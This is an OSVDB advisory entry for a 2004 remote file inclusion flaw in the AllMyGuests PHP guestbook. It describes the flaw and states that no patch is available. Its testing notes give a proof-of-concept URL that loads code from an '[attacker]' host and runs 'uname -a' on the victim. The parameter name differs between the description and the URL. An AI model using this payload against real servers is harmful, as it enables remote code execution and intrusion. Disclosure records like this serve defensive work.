AllMyGuests info.inc.php Arbitrary Code Execution

2004-02-14T00:00:00
ID OSVDB:6719
Type osvdb
Reporter Pablo Santana(m4dsk4t3r@hotmail.com)
Modified 2004-02-14T00:00:00

Description

Vulnerability Description

AllMyGuests contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when modifying the "_AMVconfig[cfg_serverpath]" parameter to reference a URL on a remote web server that contains "template.inc.php". It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

AllMyGuests contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when modifying the "_AMVconfig[cfg_serverpath]" parameter to reference a URL on a remote web server that contains "template.inc.php". It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

Manual Testing Notes

http://[victim]/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a

References:

Vendor URL: http://www.php-resource.net/content-10.html Secunia Advisory ID:10901 Related OSVDB ID: 6720 Related OSVDB ID: 6721 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-02/0452.html Keyword: Remote File Inclusion ISS X-Force ID: 15227 Generic Exploit URL: http://packetstormsecurity.nl/0402-exploits/AllMyGuests.txt CVE-2004-0285 Bugtraq ID: 9664